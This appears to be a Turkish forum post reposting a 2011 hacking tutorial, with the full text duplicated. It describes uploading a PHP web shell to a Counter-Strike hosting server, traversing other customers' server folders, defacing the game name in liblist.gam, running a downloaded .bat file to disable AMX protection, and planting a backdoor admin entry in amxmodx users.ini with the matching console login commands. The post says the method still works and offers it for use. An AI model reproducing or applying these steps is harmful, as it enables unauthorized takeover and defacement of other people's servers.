S.a Bu yazıyı arşivimde buldum tarihi 2011 ama yöntem hala geçerlidir sen oyna serverlarında vs.
------------------------------------------------------------------
-Frip & Out Method Arguments ******** ARCHIVE lv1
Author : Onur TÜRKEŞHAN
Authed/Published : Y / 26.05.2011
Language : TEK DİL TÜRKÇE !-
-----------------------------
Selam arkada$lar , simdi örnek senaryo cs serverin dedicatedindan host aldik kendimize ;
eff0nun kodlamis olduu suanlik priv8 olan phpToDLG programini kullaniyoruz , php shell
dosyamizi dlg olarak servera yüklettiriyoruz yada kendmiz panelden vs. bişekilde shelli
yükleyip shelle giriyorz. Simdi Bakacagimiz Kisim Windows2a Gore Anlatilmistir;
Software: Apache/2.2.8 (Win32) PHP/5.2.6 amx_mode ON
uname -a: Windows NT MYGAMEAREASUBSERVER5 6.1 build 7601
SYSTEM
Safe-mode: OFF (not secure)
C:\\Windows\\SubSERVERS\\5\\www\\uploads\\ drwxrwxrwx
Free 186.02 GB of 225.44 GB (82.52%)
Detected drives: [ a ] [ c ] [ d ]
C:\\Windows\\SubSERVERS\\5\\www\\uploads\\ Yazan Kısımdan SubSERVERS kismina giriyoruz
C:\\Windows\\SubSERVERS\\ a Girdikten Sonra 1den bittiği yere kadar serverlarin klasörleri
var burdan erisip panel dosyalarina shell ile hack yapabilirsiniz.
Ama aamacimiz CS Serverini hacklemekse ,
Yukardaki Klasör Yerinden Klasörümüzü
C:\\Program Files\\All Users\\valve\\cstrike Yapiyoruz ve CSTRIKE klasörüne Eriştik
Genel Olarak Kullanilacal Default Yerler Burdaki liblist.gam dosyasindan cekiliyor.
dosyayi editleme kismindan dosyanin ilk satiri olan ,
game "%servername - MyGameArea" Satirini ; game "HACKED BY türke$haN OWNZ your SysteM" olarak değiştirip kaydediyorum.
Şimdi Dedicatedin Sahibi Açtığı Her Serverda ve Oynanan Her Oyunda Server Alani Kisminda HACKED BY türke$haN OWNZ your SysteM Yazisiyla Karsilascak.
Ama Amx Olanlarda Engele Takilacak Ve Serveri Yedeklemeye Alacak Ama Onuda ByPass Ettik Ufak Bi .Bat Koduyla
)
Dusunenturk.org dosyasini indirip C:\\Windows\\SubSERVERS\\11\\www\\uploads\\ klasörüne atiyorum ve çalistiriyorum.
Bat Dosyasi Amx Dosyasini Kapatacak Ve İsim Kisminda Sikinti Cekmeyecegiz. 2. Bir Yöntemde Diyelimki Amx Değilde Parali GuardLardan Kullaniyorsa ?
Ozaman Direk Sizlere AMX Yüklü Server Admininin Accountu vs. değiştirme Yolunu Söyleyim.
C:\\Windows\\SubSERVERS\\11\\Server\\Config Files For Server\\addons\\amxmodx\\configs\\users.ini Dosyasini Aciyoruz
"onurturkesh4n" "dusunenturk" "onurturkeshanownz" "a" ekliyorum ve kaydedip cikiyorum.
simdi csyi aciyorum konsola
name "onurturkesh4n"
setinfo _pw dusunenturk
bind 9 "amxmodmenu"
yaziyorum ve fül yetkili adminim haci :] connect cs11.mygamearea.net servera baglaniyorum , exec onur.cfg cfg dosyami calistiriyorum .
admin menüsünü "9" tuşuna atadım bing 9 derken ; 9a basiyorsunuz amx admin menüsü açılıyor .
Bu DÖkümanı Yazarken üstünden gecmek istedigim bir nokta , CS server sahiplerinin wall hack vs.lere göz yummasi yada tarafli küfür mevzusudur.
Serverlarina cok guveniyorlardi private guard dosyamiz var diyorlardi en kral server bile bi bilgisayar üzerine kurulu o pc açık oldugu sürece
bypass imkani vardir unutmayin lafi cok uzatmayalim
dusunenturk
DÜŞÜNEN HERKES BİŞEYLER BECEREBİLİR BENCE
)
------------------------------------------------------------------
-Frip & Out Method Arguments ******** ARCHIVE lv1
Author : Onur TÜRKEŞHAN
Authed/Published : Y / 26.05.2011
Language : TEK DİL TÜRKÇE !-
-----------------------------
Selam arkada$lar , simdi örnek senaryo cs serverin dedicatedindan host aldik kendimize ;
eff0nun kodlamis olduu suanlik priv8 olan phpToDLG programini kullaniyoruz , php shell
dosyamizi dlg olarak servera yüklettiriyoruz yada kendmiz panelden vs. bişekilde shelli
yükleyip shelle giriyorz. Simdi Bakacagimiz Kisim Windows2a Gore Anlatilmistir;
Software: Apache/2.2.8 (Win32) PHP/5.2.6 amx_mode ON
uname -a: Windows NT MYGAMEAREASUBSERVER5 6.1 build 7601
SYSTEM
Safe-mode: OFF (not secure)
C:\\Windows\\SubSERVERS\\5\\www\\uploads\\ drwxrwxrwx
Free 186.02 GB of 225.44 GB (82.52%)
Detected drives: [ a ] [ c ] [ d ]
C:\\Windows\\SubSERVERS\\5\\www\\uploads\\ Yazan Kısımdan SubSERVERS kismina giriyoruz
C:\\Windows\\SubSERVERS\\ a Girdikten Sonra 1den bittiği yere kadar serverlarin klasörleri
var burdan erisip panel dosyalarina shell ile hack yapabilirsiniz.
Ama aamacimiz CS Serverini hacklemekse ,
Yukardaki Klasör Yerinden Klasörümüzü
C:\\Program Files\\All Users\\valve\\cstrike Yapiyoruz ve CSTRIKE klasörüne Eriştik
Genel Olarak Kullanilacal Default Yerler Burdaki liblist.gam dosyasindan cekiliyor.
dosyayi editleme kismindan dosyanin ilk satiri olan ,
game "%servername - MyGameArea" Satirini ; game "HACKED BY türke$haN OWNZ your SysteM" olarak değiştirip kaydediyorum.
Şimdi Dedicatedin Sahibi Açtığı Her Serverda ve Oynanan Her Oyunda Server Alani Kisminda HACKED BY türke$haN OWNZ your SysteM Yazisiyla Karsilascak.
Ama Amx Olanlarda Engele Takilacak Ve Serveri Yedeklemeye Alacak Ama Onuda ByPass Ettik Ufak Bi .Bat Koduyla
Dusunenturk.org dosyasini indirip C:\\Windows\\SubSERVERS\\11\\www\\uploads\\ klasörüne atiyorum ve çalistiriyorum.
Bat Dosyasi Amx Dosyasini Kapatacak Ve İsim Kisminda Sikinti Cekmeyecegiz. 2. Bir Yöntemde Diyelimki Amx Değilde Parali GuardLardan Kullaniyorsa ?
Ozaman Direk Sizlere AMX Yüklü Server Admininin Accountu vs. değiştirme Yolunu Söyleyim.
C:\\Windows\\SubSERVERS\\11\\Server\\Config Files For Server\\addons\\amxmodx\\configs\\users.ini Dosyasini Aciyoruz
"onurturkesh4n" "dusunenturk" "onurturkeshanownz" "a" ekliyorum ve kaydedip cikiyorum.
simdi csyi aciyorum konsola
name "onurturkesh4n"
setinfo _pw dusunenturk
bind 9 "amxmodmenu"
yaziyorum ve fül yetkili adminim haci :] connect cs11.mygamearea.net servera baglaniyorum , exec onur.cfg cfg dosyami calistiriyorum .
admin menüsünü "9" tuşuna atadım bing 9 derken ; 9a basiyorsunuz amx admin menüsü açılıyor .
Bu DÖkümanı Yazarken üstünden gecmek istedigim bir nokta , CS server sahiplerinin wall hack vs.lere göz yummasi yada tarafli küfür mevzusudur.
Serverlarina cok guveniyorlardi private guard dosyamiz var diyorlardi en kral server bile bi bilgisayar üzerine kurulu o pc açık oldugu sürece
bypass imkani vardir unutmayin lafi cok uzatmayalim
dusunenturk
DÜŞÜNEN HERKES BİŞEYLER BECEREBİLİR BENCE